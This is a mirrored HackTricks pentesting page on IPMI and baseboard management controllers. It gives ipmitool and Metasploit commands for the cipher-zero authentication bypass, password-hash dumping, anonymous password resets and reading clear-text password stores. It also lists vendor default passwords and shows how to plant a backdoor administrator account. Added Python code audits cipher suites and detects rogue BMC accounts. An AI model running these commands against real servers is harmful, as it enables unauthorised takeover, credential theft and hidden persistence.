mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-03 00:38:52 +00:00
184 lines
10 KiB
Markdown
# 623/UDP/TCP - IPMI
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>

Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:

{% embed url="https://academy.8ksec.io/" %}

## Basic Information

### **Overview of IPMI**

**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for:

- Pre-OS boot configurations
- Power-off management
- Recovery from system failures

IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. All it needs in order to operate is a power source and a LAN connection.

Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include:

- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations.
- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections.
- **IPMI Memory:** For storing logs and data.

![IPMI block diagram](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)

**Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP)

## Enumeration

### Discovery

```bash
nmap -n -p 623 10.0.0.0/24        # TCP probe (less common transport)
nmap -n -sU -p 623 10.0.0.0/24    # UDP probe (IPMI's usual transport)
use auxiliary/scanner/ipmi/ipmi_version
```

You can **identify** the **version** using:

```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```

### IPMI Vulnerabilities

Dan Farmer uncovered a significant security flaw in IPMI 2.0 involving **cipher suite 0**. As documented in [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), a client that selects cipher 0 is authenticated with any password, as long as it supplies a valid username. The weakness was found in BMCs from manufacturers such as HP, Dell, and Supermicro, suggesting the issue is widespread across IPMI 2.0 implementations.

### **IPMI Authentication Bypass via Cipher 0**

To detect this flaw, the following Metasploit auxiliary scanner can be employed:

```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```

Exploitation of this flaw is achievable with `ipmitool`, as demonstrated below, allowing for the listing and modification of user passwords:

```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users (-C 0 selects cipher suite 0)
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes the password of user ID 2
```
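
The defender-side check for this flaw is whether cipher suite 0 is still enabled on the BMC's LAN channel. The following Python is an added example (not code from the HackTricks page or from ipmitool): it parses the `Cipher Suite Priv Max` line of `ipmitool lan print` output, flags cipher 0 and, optionally, the suites that authenticate but leave session traffic unencrypted, and builds the `ipmitool lan set <channel> cipher_privs` command that disables them. The sample output is constructed to match ipmitool's format; the cipher suite classification follows IPMI 2.0 spec Table 22-20.

```python
import re
from typing import Dict, List

# IPMI 2.0 cipher suites (spec Table 22-20): suite 0 has no authentication,
# integrity or confidentiality; the others listed here authenticate but send
# session traffic unencrypted.
CIPHER_ZERO = 0
CLEARTEXT_SUITES = {0, 1, 2, 6, 7, 11}

# Meaning of each letter in the 'Cipher Suite Priv Max' string of `ipmitool lan print`.
PRIV_LETTERS = {"X": "unused", "c": "CALLBACK", "u": "USER", "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}

# Constructed excerpt of `ipmitool lan print 1` output (not from a real device).
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 10.0.0.22
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""


def parse_cipher_privs(lan_print: str) -> Dict[int, str]:
    """Map cipher suite ID -> max privilege letter; position i of the string is suite i."""
    m = re.search(r"^Cipher Suite Priv Max\s*:\s*([XcuoaO]+)\s*$", lan_print, re.MULTILINE)
    if not m:
        raise ValueError("no 'Cipher Suite Priv Max' line in ipmitool output")
    return dict(enumerate(m.group(1)))


def audit_cipher_privs(privs: Dict[int, str]) -> List[str]:
    """Flag suites that are enabled (not 'X') and give a client a free or unencrypted session."""
    findings = []
    for suite, letter in sorted(privs.items()):
        if letter == "X":
            continue
        level = PRIV_LETTERS.get(letter, letter)
        if suite == CIPHER_ZERO:
            findings.append(f"cipher suite 0 enabled up to {level}: any password is accepted (cipher-zero bypass)")
        elif suite in CLEARTEXT_SUITES:
            findings.append(f"cipher suite {suite} enabled up to {level}: session traffic is unencrypted")
    return findings


def hardened_priv_string(privs: Dict[int, str], strict: bool = False) -> str:
    """Privilege string with cipher 0 disabled; strict=True also disables the unencrypted suites."""
    disabled = CLEARTEXT_SUITES if strict else {CIPHER_ZERO}
    return "".join("X" if suite in disabled else letter for suite, letter in sorted(privs.items()))


def remediation_command(channel: int, privs: Dict[int, str], strict: bool = False) -> str:
    """ipmitool command that applies the hardened string to the given LAN channel."""
    return f"ipmitool lan set {channel} cipher_privs {hardened_priv_string(privs, strict)}"


if __name__ == "__main__":
    privs = parse_cipher_privs(SAMPLE_LAN_PRINT)
    for finding in audit_cipher_privs(privs):
        print("FINDING:", finding)
    print("fix:", remediation_command(1, privs))
```

The 15-character string assigns one privilege letter per cipher suite in ID order, so disabling cipher 0 means setting the first character to `X`. After applying the command, re-run `ipmitool lan print` on the channel and confirm that the `ipmi_cipher_zero` scanner above no longer reports the BMC.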

### **IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval**

This vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username: the BMC returns an HMAC keyed with the user's password during the RAKP handshake, before the client has proven anything, so the value can be captured and cracked offline. To test this vulnerability, Metasploit offers a module:

```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```

### **IPMI Anonymous Authentication**

A default configuration in many BMCs allows "anonymous" access, characterized by null username and password strings. This configuration can be exploited to reset passwords of named user accounts using `ipmitool`:

```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
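
Both the version identification in the Discovery section and the anonymous-login check above rest on one session-less IPMI command, Get Channel Authentication Capabilities, whose reply carries the IPMI version bits and the "anonymous login enabled" / "null usernames enabled" flags. The following Python is an added example, not code from the HackTricks page, nmap or Metasploit: it builds the same request that the `ipmi-version` script and the `ipmi_version` module send, parses a reply, and lists the findings a BMC owner should fix. Field offsets follow IPMI 2.0 spec section 22.13; the sample reply bytes are constructed, and `probe()` is a thin UDP wrapper for use against BMCs you administer.

```python
import socket
from typing import Dict, List

RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])  # RMCP v6, reserved, seq 0xFF (no ack), class IPMI
BMC_SLAVE_ADDR = 0x20
REMOTE_CONSOLE_ADDR = 0x81
NETFN_APP_REQUEST, NETFN_APP_RESPONSE = 0x06, 0x07
CMD_GET_CHANNEL_AUTH_CAPS = 0x38
AUTH_TYPE_BITS = ((0, "none"), (1, "md2"), (2, "md5"), (4, "password"), (5, "oem"))


def ipmi_checksum(data: bytes) -> int:
    """IPMI 2's-complement checksum: the byte that makes the modulo-256 sum zero."""
    return (-sum(data)) & 0xFF


def build_get_channel_auth_caps(channel: int = 0x0E, priv_level: int = 4) -> bytes:
    """Session-less Get Channel Authentication Capabilities request (IPMI 2.0 spec 22.13).
    Bit 7 of the channel byte asks for IPMI 2.0 extended data; 0x0E means 'this channel'."""
    session_hdr = bytes([0x00]) + bytes(4) + bytes(4)  # auth type NONE, seq 0, session id 0
    hdr = bytes([BMC_SLAVE_ADDR, NETFN_APP_REQUEST << 2])
    hdr += bytes([ipmi_checksum(hdr)])
    body = bytes([REMOTE_CONSOLE_ADDR, 0x00, CMD_GET_CHANNEL_AUTH_CAPS,
                  0x80 | (channel & 0x0F), priv_level & 0x0F])
    body += bytes([ipmi_checksum(body)])
    msg = hdr + body
    return RMCP_HEADER + session_hdr + bytes([len(msg)]) + msg


def parse_get_channel_auth_caps(packet: bytes) -> Dict[str, object]:
    """Decode the response and expose the fields a BMC owner should review."""
    if len(packet) < 14 or packet[:4] != RMCP_HEADER:
        raise ValueError("not an RMCP/IPMI packet")
    if packet[4] != 0x00:
        raise ValueError("unexpected session auth type in session-less reply")
    msg = packet[14:14 + packet[13]]
    if len(msg) != packet[13] or len(msg) < 16:
        raise ValueError("truncated IPMI message")
    if ipmi_checksum(msg[:2]) != msg[2] or ipmi_checksum(msg[3:-1]) != msg[-1]:
        raise ValueError("IPMI checksum mismatch")
    if msg[1] >> 2 != NETFN_APP_RESPONSE or msg[5] != CMD_GET_CHANNEL_AUTH_CAPS:
        raise ValueError("not a Get Channel Authentication Capabilities response")
    if msg[6] != 0x00:
        raise ValueError("completion code %#x" % msg[6])
    channel, auth_support, status, ext = msg[7], msg[8], msg[9], msg[10]
    has_ext = bool(auth_support & 0x80)  # IPMI 2.0 extended capabilities present
    return {
        "channel": channel & 0x0F,
        "ipmi_2_0": has_ext and bool(ext & 0x02),
        "ipmi_1_5": bool(ext & 0x01) if has_ext else True,
        "auth_types": [name for bit, name in AUTH_TYPE_BITS if auth_support & (1 << bit)],
        "kg_non_zero": bool(status & 0x20),
        "per_message_auth_disabled": bool(status & 0x10),
        "user_level_auth_disabled": bool(status & 0x08),
        "non_null_usernames_enabled": bool(status & 0x04),
        "null_usernames_enabled": bool(status & 0x02),
        "anonymous_login_enabled": bool(status & 0x01),
        "oem_iana": int.from_bytes(msg[11:14], "little"),
    }


def audit_findings(caps: Dict[str, object]) -> List[str]:
    """Turn the parsed capabilities into findings worth fixing on a BMC you own."""
    findings = []
    if caps["anonymous_login_enabled"]:
        findings.append("anonymous login enabled: an empty username and password are accepted")
    if caps["null_usernames_enabled"]:
        findings.append("null usernames enabled: accounts with an empty name can authenticate")
    if "none" in caps["auth_types"]:
        findings.append("auth type NONE accepted for IPMI 1.5 sessions")
    if caps["per_message_auth_disabled"] or caps["user_level_auth_disabled"]:
        findings.append("per-message or user-level authentication disabled")
    return findings


# Constructed reply (not captured from a real BMC): channel 1, IPMI 1.5 + 2.0,
# auth types none/MD2/MD5/password, anonymous and null-username logins enabled.
SAMPLE_RESPONSE = bytes.fromhex(
    "0600ff07" "00" "00000000" "00000000" "10"
    "811c63" "200038" "00" "01" "97" "07" "03" "000000" "00" "06"
)


def probe(host: str, port: int = 623, timeout: float = 2.0) -> Dict[str, object]:
    """Send the request to a BMC you administer and parse its reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_get_channel_auth_caps(), (host, port))
        data, _ = sock.recvfrom(512)
    return parse_get_channel_auth_caps(data)
```

The request the builder emits is byte-identical to the one nmap's `ipmi-version` script sends, which is why the parser also covers the "IPMI 2.0 / anonymous login" output those scanners print. The parser rejects packets with a bad checksum, a non-zero completion code or a foreign command before trusting any flag, so a truncated or spoofed reply does not produce a false "clean" result.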

### **Supermicro IPMI Clear-text Passwords**

A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes (the RAKP exchange keys an HMAC with the password, so the BMC must hold it in recoverable form). Supermicro's storage of these passwords in locations such as `/nv/PSBlock` or `/nv/PSStore` raises significant security concerns:

```bash
cat /nv/PSBlock
```

### **Supermicro IPMI UPnP Vulnerability**

Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by [Rapid7's disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), allow for root access to the BMC:

```bash
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```

### Brute Force

**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows:

- **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level.
- Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
- Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.

## Accessing the Host via BMC

Administrative access to the Baseboard Management Controller (BMC) opens various pathways for accessing the host's operating system. A straightforward approach involves exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality. This can be done by either rebooting the host to a root shell via GRUB (using `init=/bin/sh`) or booting from a virtual CD-ROM set as a rescue disk. Such methods allow for direct manipulation of the host's disk, including the insertion of backdoors, data extraction, or any necessary actions for a security assessment. However, this requires rebooting the host, which is a significant drawback.

Without rebooting, accessing the running host is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can easily be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via `ipmitool`. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, is an area that demands further investigation.

## Introducing Backdoors into BMC from the Host

Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.

```bash
ipmitool user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            true    false      false      Unknown (0x00)
3   root             true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4          # privilege level 4 = ADMINISTRATOR
ipmitool user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            true    false      false      Unknown (0x00)
3   root             true    false      false      Unknown (0x00)
4   backdoor         true    false      true       ADMINISTRATOR
```
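
Because this persistence lives in the BMC rather than on the host's disk, a host rebuild does not remove it; what does catch it is periodically snapshotting the BMC account table and diffing it against a known-good baseline. The following Python is an added example, not code from the HackTricks page or from ipmitool: it parses `ipmitool user list` output (the two listings are constructed to match the before/after output above), reports accounts added, removed or changed relative to the baseline, and flags administrator accounts outside an approved set as well as nameless accounts that have IPMI messaging enabled.

```python
import re
from typing import Dict, List, Set

# One row of `ipmitool user list`; the Name column may be empty (the null user).
USER_ROW = re.compile(
    r"^\s*(?P<id>\d+)\s+(?P<name>\S*?)\s+(?P<callin>true|false)\s+"
    r"(?P<link>true|false)\s+(?P<ipmi>true|false)\s+(?P<priv>\S.*?)\s*$"
)

# Constructed listings modelled on the before/after output above (not from a real BMC).
BASELINE_LISTING = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      NO ACCESS
2   ADMIN            true    false      true       ADMINISTRATOR
3   root             true    false      true       ADMINISTRATOR
"""
CURRENT_LISTING = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       USER
2   ADMIN            true    false      true       ADMINISTRATOR
3   root             true    false      true       ADMINISTRATOR
4   backdoor         true    false      true       ADMINISTRATOR
"""


def parse_user_list(listing: str) -> Dict[int, dict]:
    """Map user ID -> {name, ipmi_msg, priv}; header and blank lines are skipped."""
    users = {}
    for line in listing.splitlines():
        m = USER_ROW.match(line)
        if m:
            users[int(m["id"])] = {
                "name": m["name"],
                "ipmi_msg": m["ipmi"] == "true",
                "priv": m["priv"],
            }
    return users


def diff_user_lists(baseline: Dict[int, dict], current: Dict[int, dict]) -> List[str]:
    """Report accounts added, removed or changed relative to a known-good baseline."""
    alerts = []
    for uid in sorted(set(baseline) | set(current)):
        before, after = baseline.get(uid), current.get(uid)
        if before is None:
            alerts.append(f"added: user {uid} '{after['name']}' priv={after['priv']} ipmi_msg={after['ipmi_msg']}")
        elif after is None:
            alerts.append(f"removed: user {uid} '{before['name']}'")
        elif before != after:
            alerts.append(
                f"changed: user {uid} '{before['name']}' -> '{after['name']}' "
                f"{before['priv']} -> {after['priv']} ipmi_msg {before['ipmi_msg']} -> {after['ipmi_msg']}"
            )
    return alerts


def audit_users(users: Dict[int, dict], approved_admins: Set[str]) -> List[str]:
    """Flag privileged accounts outside the approved set and nameless accounts that can log in."""
    findings = []
    for uid, u in sorted(users.items()):
        if u["priv"] == "ADMINISTRATOR" and u["name"] not in approved_admins:
            findings.append(f"user {uid} '{u['name']}' has ADMINISTRATOR privilege but is not an approved admin")
        if u["ipmi_msg"] and not u["name"]:
            findings.append(f"user {uid} has an empty name but IPMI messaging enabled (anonymous login path)")
    return findings


if __name__ == "__main__":
    baseline = parse_user_list(BASELINE_LISTING)
    current = parse_user_list(CURRENT_LISTING)
    for alert in diff_user_lists(baseline, current):
        print("ALERT:", alert)
    for finding in audit_users(current, {"ADMIN", "root"}):
        print("FINDING:", finding)
```

Run the listing from the host's local interface (`ipmitool user list`) or over the network (`ipmitool -I lanplus ... user list`), store the baseline alongside the rest of the server's configuration baseline, and alert on any diff: a new ADMINISTRATOR account or a null user that gains IPMI messaging is a strong signal on a channel that host-based tooling never inspects.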

## Shodan

* `port:623`

## References

* [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)